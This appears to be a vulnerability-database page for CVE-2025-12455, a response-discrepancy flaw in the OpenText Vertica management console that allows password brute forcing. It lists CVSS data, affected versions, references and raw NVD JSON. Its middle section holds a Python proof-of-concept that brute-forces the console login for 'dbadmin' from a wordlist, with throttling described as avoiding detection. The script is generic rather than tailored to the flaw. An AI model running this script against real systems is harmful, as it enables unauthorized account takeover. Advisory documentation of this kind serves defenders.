CVE-2025-12455

Description

Observable response discrepancy vulnerability in OpenText™ Vertica allows Password Brute Forcing. The vulnerability could lead to Password Brute Forcing in Vertica management console application.This issue affects Vertica: from 10.0 through 10.X, from 11.0 through 11.X, from 12.0 through 12.X.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:opentext:vertica:*:*:*:*:*:*:*:* - VULNERABLE

OpenText Vertica 10.0 - 10.X

OpenText Vertica 11.0 - 11.X

OpenText Vertica 12.0 - 12.X

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-12455 PoC - Vertica Password Brute Force
# This PoC demonstrates the Observable Response Discrepancy vulnerability

import requests
import time
import sys
from concurrent.futures import ThreadPoolExecutor

TARGET_URL = "https://TARGET_IP:8444/login"
USERNAME = "dbadmin"
PASSWORD_FILE = "passwords.txt"

def try_login(password):
    """Attempt login with given password"""
    data = {
        "username": USERNAME,
        "password": password
    }
    
    start_time = time.time()
    try:
        response = requests.post(TARGET_URL, data=data, verify=False, timeout=30)
        elapsed = time.time() - start_time
        
        # Check for response discrepancy indicators
        # Correct password may have different response time or content
        if response.status_code == 302 or "session" in response.cookies:
            print(f"[+] SUCCESS: Password found: {password}")
            return True, password
        elif elapsed > 2.0:  # Response time discrepancy
            print(f"[*] Possible match, response time: {elapsed}s")
            return False, password
        else:
            print(f"[-] Failed: {password}")
            return False, None
    except Exception as e:
        print(f"[!] Error: {e}")
        return False, None

def main():
    print(f"[*] CVE-2025-12455 PoC - Vertica Brute Force")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Username: {USERNAME}")
    
    with open(PASSWORD_FILE, 'r') as f:
        passwords = [line.strip() for line in f]
    
    print(f"[*] Loaded {len(passwords)} passwords")
    
    # Sequential approach to avoid detection
    for password in passwords:
        success, found = try_login(password)
        if success:
            print(f"\n[!] VULNERABLE: Password is '{found}'")
            break
        time.sleep(1)  # Rate limiting

if __name__ == "__main__":
    main()

# Mitigation: Enable account lockout, implement rate limiting, use CAPTCHA

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12455
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12455
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12455/
[4] VulDB https://vuldb.com/cve/CVE-2025-12455
[5] https://portal.microfocus.com/s/article/KM000045854?language=en_US

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12455", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:53:47.873", "lastModified": "2026-04-17T15:18:57.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Observable response discrepancy vulnerability in OpenText™ Vertica allows Password Brute Forcing. \nThe vulnerability could lead to Password Brute Forcing in Vertica management console application.This issue affects Vertica: from 10.0 through 10.X, from 11.0 through 11.X, from 12.0 through 12.X."}, {"lang": "es", "value": "Vulnerabilidad de discrepancia de respuesta observable en OpenText™ Vertica permite el forzado de contraseña por fuerza bruta.\nLa vulnerabilidad podría conducir al forzado de contraseña por fuerza bruta en la aplicación de consola de gestión de Vertica. Este problema afecta a Vertica: desde 10.0 hasta 10.X, desde 11.0 hasta 11.X, desde 12.0 hasta 12.X."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:U/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "ACTIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NEGLIGIBLE", "Automatable": "YES", "Recovery": "USER", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-204"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opentext:vertica:*:*:*:*:*:*:*:*", "versionStartIncluding": "10.0.0-0", "versionEndIncluding": "12.0.4-34", "matchCriteriaId": "DE167C3A-8090-4A7C-A725-3406D3CF1418"}]}]}], "references": [{"url": "https://portal.microfocus.com/s/article/KM000045854?language=en_US", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}